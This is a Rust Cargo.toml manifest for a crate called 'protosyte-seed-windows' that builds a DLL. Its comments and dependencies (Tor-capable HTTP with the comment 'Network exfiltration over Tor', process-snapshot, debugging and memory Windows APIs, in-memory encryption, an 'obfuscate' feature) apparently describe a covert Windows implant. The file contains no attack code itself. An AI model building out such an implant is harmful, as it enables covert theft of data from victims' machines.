[package]
name = "protosyte-seed-windows"
version = "0.1.0"
edition = "2021"

[lib]
name = "protosyte"
crate-type = ["cdylib", "rlib"]

[dependencies]
# Protobuf serialization/deserialization
prost = { version = "0.14", features = ["derive"] }
prost-types = "0.14"

# Network exfiltration over Tor
reqwest = { version = "0.12", features = ["rustls-tls", "socks", "multipart"] }
tokio = { version = "1.40", features = ["full"] }

# In-memory data processing
aes-gcm = "0.10"
lz4 = "1.28"
zeroize = "1.8"

# Windows-specific
winapi = { version = "0.3", features = ["winbase", "winuser", "fileapi", "handleapi", "memoryapi", "synchapi", "processthreadsapi", "libloaderapi", "winnt", "winreg", "tlhelp32", "debugapi", "ktmw32"] }
windows = { version = "0.62", features = ["Win32_Foundation", "Win32_System_Memory", "Win32_System_Threading", "Win32_System_LibraryLoader"] }

# Additional utilities
sha2 = "0.10"
hmac = "0.12"
hex = "0.4"
rand = "0.9"
regex = "1.10"

[build-dependencies]
prost-build = "0.14"

[features]
default = []
obfuscate = []

